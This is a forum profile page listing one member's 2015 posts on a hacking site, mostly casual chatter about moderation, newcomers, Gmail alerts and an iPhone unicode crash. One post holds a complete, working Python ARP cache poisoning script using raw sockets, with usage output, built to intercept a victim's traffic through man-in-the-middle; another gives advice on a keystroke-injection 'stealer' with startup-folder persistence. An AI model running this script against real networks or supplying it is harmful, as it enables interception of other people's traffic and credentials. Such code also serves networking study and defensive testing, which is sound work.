Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - techb

Pages: 1 [2] 3 4 ... 133
16
General discussion / Re: Your vote counts
« on: June 06, 2015, 07:31:11 am »
Well shit.

17
Web Oriented Programming / Re: Please don't hunt me down and kill me
« on: June 06, 2015, 06:32:00 am »
That has sorted it, thank you Rytiou..

Can I ask though please, with regards to your response (point number three); is there not an easier way to align the text exactly to the middle of the image, without having to manually adjust the margins? i.e left: 50px; top 50px etc.. Not only is this time consuming and code heavy, it is not entirely accurate?

Mugman

Uhhh.. center. Please post this kind of thing on sites that accept it like Stackoverflow or Daniweb. Rytiou was kind on giving you an answer, but this is NOT the site to post such questions. If it is about hackin then sure maybe, but this is simple homework help kinda shit and is not welcome here. There are plenty of sites like daniweb and stackoverflow to help with such things.

Locked because it should just not be in this forum, also locked and not removed since an answer  is given and maybe someone else might see this before posting such questions.

/

19
Hacking and Security / Re: Gmail: New sign-in from...
« on: June 02, 2015, 03:15:41 pm »
i think they should send a sms alert to registered number & a mail to alternative email or recovery email

because a attacker can easily delete the email

I would drop gmail as an email provider if they switched to something like facebook does. Just no.

20
Feedback / Re: The Noob Invasion.
« on: June 02, 2015, 03:08:48 pm »
The noob plague is nothing new. You've only been a member for about a year now. This has been happening since forums or bboards where a thing in general back in the late 80s and early 90s. Just get used to it, it wont go away.

I have noticed though that the influx of member intros are usually concise with beginning and ending school year/semester times. American school year anyway. Sometimes we get influxes in registration and shit where you see like 5 to 10 or more people join right around the same time. You can contribute to friends telling friends about this "cool new hacking site" they just found, or even teachers linking here.

You rarely see me post in such threads anymore. Only when I see some lols I can have or of the such. Hides grow thick with time. I'm not really an oldfag, but I know who my friends are, and I know enough about ez to understand 'n00bz'.

The real thing we need to worry about is the people actually wanting to learn something. We all start somewhere, and this is a great place to start if you can lurk long enough to learn.

21
Members introduction / Re: printf("Hello, evilzone\n")
« on: June 02, 2015, 12:57:40 pm »


As for MitM via ARP poisoning, I just recently posted a tutorial on doing it with python 2 different ways.

Tutorial
https://evilzone.org/tutorials/arp-cache-poisen-via-python/
Raw sockets example
https://evilzone.org/scripting-languages/%28python%29arp-poison-using-raw-sockets/

22
Members introduction / Re: My curiosity of computers brought me here
« on: June 02, 2015, 12:14:10 pm »
Your avatar looks like the Hamburglar from McDonalds grew a beard. I know it is supposed to be the Joker, but when I look at it I want a big mac.

23
Scripting languages / Re: [python]ARP poison using raw sockets
« on: June 01, 2015, 01:46:23 pm »
Bump. I figured it out. I explain it in the original post, the code is working now.

24
Scripting languages / [python]ARP poison using raw sockets
« on: May 31, 2015, 06:35:16 am »
This is a script to poison the ARP table using raw sockets. It requires Linux, and specifically at or greater than Linux 2.0. Windows simply can not do this with this script. This is an example on building packets by hand in binary form and sending to the driver at Layer 2 (network), skipping Layer 3 (ip) all together using PF_PACKET and raw sockets.

=-=-=-EDIT-=-=-=

The code is working now. The reason it wasn't before was because of using .upper() on the mac address conversions.
Code: [Select]
binascii.unhexlify(''.join(vmac.split(':'))).upper()It was applying the upper method to the binary string. I removed it and it is working. With further testing I found out the mac address could use upper case or lower case hex chars, but have converted them to lower case before converting to binary form. Only because I plan on extending the script and want consistency. I/you can make them upper case before the conversion, but with error testing it is easier to read in lower case for me.

Anyway, code is working like a charm now. Usage:
Code: [Select]
[techb@techb_media Python]$ sudo python2 arpraw.py -h
usage: arpraw.py [-h] -vm VICTIMMAC -vi VICTIMIP -tm TARGETMAC -ti TARGETIP
                 [-d DELAY]

ARP poison using raw sockets

optional arguments:
  -h, --help            show this help message and exit
  -vm VICTIMMAC, --victimmac VICTIMMAC
                        Victim MAC address
  -vi VICTIMIP, --victimip VICTIMIP
                        Victim IP address
  -tm TARGETMAC, --targetmac TARGETMAC
                        Target MAC address [gateway]
  -ti TARGETIP, --targetip TARGETIP
                        Target IP address [gateway]
  -d DELAY, --delay DELAY
                        Delay in seconds between sending packets [optional]

Code: Python
  1. #! /usr/bin/python2
  2.  
  3. # ARP poison example using raw packets
  4. #   instead of scapy. Note that this is
  5. #   very noisey. Any half brained admin
  6. #   would notice the arp activity.
  7. # victim == the computer we want to sniff
  8. # target == default gateway (in most cases)
  9. # Written by: techb
  10. # Date: May 28 2015
  11. # Python: Version 2.7
  12. # OS dev on: Arch Linux
  13. # License: None, script is public domain,  but at
  14. #   least credit me if you share this.
  15. # This script is presented 'as is' and the author
  16. #   is not responsible for misuse or errors you may get.
  17.  
  18. import binascii
  19. import socket
  20. import time
  21. import argparse
  22.  
  23. def getInterfaces():
  24.         '''This function is not used here, but if you
  25.            don't know what interface you want to use
  26.            or the name of it. Since I'm on Arch they
  27.            decided it would be a good idea to make simple
  28.            interface names all fuckey '''
  29.         # NEVER import inside a function or method
  30.         # I put it here incase you used the function
  31.         #   to show you need these libs for it.
  32.         import os, re
  33.         raw = os.popen("ip link show").read()
  34.         interface = re.findall(r"\d: \w+:", raw)
  35.         ilist = []
  36.         for i in interface:
  37.                 ilist.append(i[:-1])
  38.         return ilist
  39.        
  40. def getOwnMac(interface):
  41.         '''Uhhhh, gets my own mac address.'''
  42.         fd = open("/sys/class/net/%s/address" % interface , "r")
  43.         mac = fd.read()
  44.         fd.close()
  45.         return mac.strip()
  46.  
  47. def buildPoison(victim, target, mymac):
  48.     '''builds the custom packet used to poison
  49.       the arp cache. Arguments should be tuples
  50.       comtaining the ip and mac. (ip, mac)'''
  51.     vip = victim[0]
  52.     vmac = victim[1].lower()
  53.     tip = target[0]
  54.     tmac = target[1].lower()
  55.  
  56.     # create binary values to be sent on wire
  57.     # the mac addr conversons are very ugly but work =)
  58.     vip = socket.inet_aton(vip)
  59.     vmac = binascii.unhexlify(''.join(vmac.split(':')))
  60.     tip = socket.inet_aton(tip)
  61.     tmac = binascii.unhexlify(''.join(tmac.split(':')))
  62.     mymac = binascii.unhexlify(''.join(mymac.split(':')))
  63.  
  64.     # build ethernet headers
  65.     pcode = '\x08\x06' #ARP code for eth header
  66.     veth = vmac+mymac+pcode
  67.     teth = tmac+mymac+pcode
  68.  
  69.     # build arp headers
  70.     htype = '\x00\x01' # we're on ethernet
  71.     proto = '\x08\x00' # intended protocol, which is ipv4
  72.     hsize = '\x06' # mac addr size
  73.     psize = '\x04' # ip addr size
  74.     opcode = '\x00\x02' # arp option code, 2 is reply
  75.     arp = htype+proto+hsize+psize+opcode
  76.  
  77.     # build spoofed portion of arp header
  78.     vspoof = mymac+tip+vmac+vip # victim
  79.     tspoof = mymac+vip+tmac+tip # target
  80.  
  81.     # build final packets
  82.     vpacket = veth+arp+vspoof
  83.     tpacket = teth+arp+tspoof
  84.  
  85.     return (vpacket, tpacket)
  86.  
  87. def main(v_mac, t_mac, delay=2):
  88.     '''Main loop. Can pass a delay argument, defaults to 2 seconds.'''
  89.     interface = 'enp2s0' #yours will probably be diff
  90.     my_mac = getOwnMac(interface)
  91.     s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
  92.     s.bind((interface, socket.htons(0x0800)))
  93.     packets = buildPoison(v_mac, t_mac, my_mac)
  94.     print "Poisoning..."
  95.     while True:
  96.         s.send(packets[0])
  97.         s.send(packets[1])
  98.         time.sleep(delay)
  99.  
  100. if __name__ == '__main__':
  101.     ap = argparse.ArgumentParser(description="ARP poison using raw sockets")
  102.     ap.add_argument("-vm", "--victimmac", help="Victim MAC address", required=True)
  103.     ap.add_argument("-vi", "--victimip", help="Victim IP address", required=True)
  104.     ap.add_argument("-tm", "--targetmac", help="Target MAC address [gateway]", required=True)
  105.     ap.add_argument("-ti", "--targetip", help="Target IP address [gateway]", required=True)
  106.     ap.add_argument("-d", "--delay", help="Delay in seconds between sending packets [optional]", type=float)
  107.     args = ap.parse_args()
  108.    
  109.     if args.delay:
  110.         main((args.victimip, args.victimmac), (args.targetip, args.targetmac), delay=args.delay)
  111.     else:
  112.         main((args.victimip, args.victimmac), (args.targetip, args.targetmac))
  113.  

25
Scripting languages / Re: [DUCKY] DeepCopy Ducky Stealer v1.0 (WIP)
« on: May 31, 2015, 06:05:31 am »
Honestly, I think going the vbs route would be better all around. More flexibility and could have it put it in the startup folder. Or just write your own code and compile it and just have the ducky copy it over and run it. The ducky script would still be useful to cd into a temp dir and go from there. Have your own code do the heavy lifting.

26
Hacking and Security / Re: Is hacking a mentality or skillset?
« on: May 29, 2015, 01:57:07 pm »
Oh for fuck sake really? Has this question not been answered not a couple of weeks ago on this forum? Let alone the Internet constantly?
[snip]

Welcome to the internet.

27
Members introduction / Re: System.out.println("Hello EvilZone");
« on: May 28, 2015, 02:08:56 pm »
Aaaaaaannnnndddddd he's gone. I think we should remove member intros after like a month or so.

28
Found it on the Webs / Re: iPhone Crash / Reboot Exploit
« on: May 28, 2015, 01:18:15 pm »
Actually it's been around a while. It crashes because Apple doesn't agree with Unicode.
Edit: To clarify it is a bug, Apple isn't just being stubborn. I wouldn't put it past them to try to create a brand new format though.

You mean create a whole new phone to sell for 400% markup lol.

Interesting I wish I had an iPhone handy. Would be fun to test the ssid. Make portable routers to crash any iPhone looking for wifi

I don't own an iPhone, but from what it sounds like, only happening with the notifications, an open access point with the unicode ssid might not work. Unless the ssid is in the notification maybe? Idk, would be cool to test out though.

29
Mobile Hacking / Re: Smartphone that supports monitor mode?
« on: May 27, 2015, 01:12:39 pm »
OR you could get a raspberry pi and use that. Would need to add a gsm radio to make it technically a phone if you really needed it, but meh.

30
Programming newbies / Re: Starting programming?
« on: May 27, 2015, 01:00:54 pm »
If you want to be lazy AND learn, then hop on youtube and watch computer science or software lectures. MIT and Stanford have complete semesters uploaded as open courseware.

Pages: 1 [2] 3 4 ... 133


Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.